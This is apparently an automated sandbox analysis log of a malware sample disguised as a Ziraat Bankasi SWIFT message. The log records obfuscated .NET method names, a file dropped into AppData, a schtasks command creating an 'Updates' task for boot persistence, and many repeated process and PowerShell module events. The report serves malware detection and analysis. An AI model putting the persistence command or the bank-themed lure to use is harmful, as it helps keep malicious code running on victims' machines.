            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, X2PtWR8nM7XgLEsiB1.csHigh entropy of concatenated method names: 'owiw26I08U', 'hZcw6BFuof', 'I1Awr7Evc1', 'sRpwW0XYsm', 'z1ew5PKgnQ', 'If3wkmi4Ng', 'DXswAlThxK', 'NU7whyVbhD', 'nt6wVLrU0Q', 'vdSwyXLA0q'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, YgONXxyGkWEK9kKFEi.csHigh entropy of concatenated method names: 'bu7OGruICi', 'MYTOCcnIDF', 'v5sOQn3WVP', 'nboODY3ejQ', 'F7GOECk4Ib', 'tBWOZEIF2Z', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, nRi2E6kBg4bm6wJjV9.csHigh entropy of concatenated method names: 'OifYhIbOnp', 'tZ3YyfuZHT', 'sh7bvnyeTg', 'y5PbtQomU8', 'XQZYmJe1dx', 'LYgYXwAKdp', 'nZvYlBWFXm', 'opHY2Dpfnf', 'ktDY6QTRmt', 'CcrYrsGyym'
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile created: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
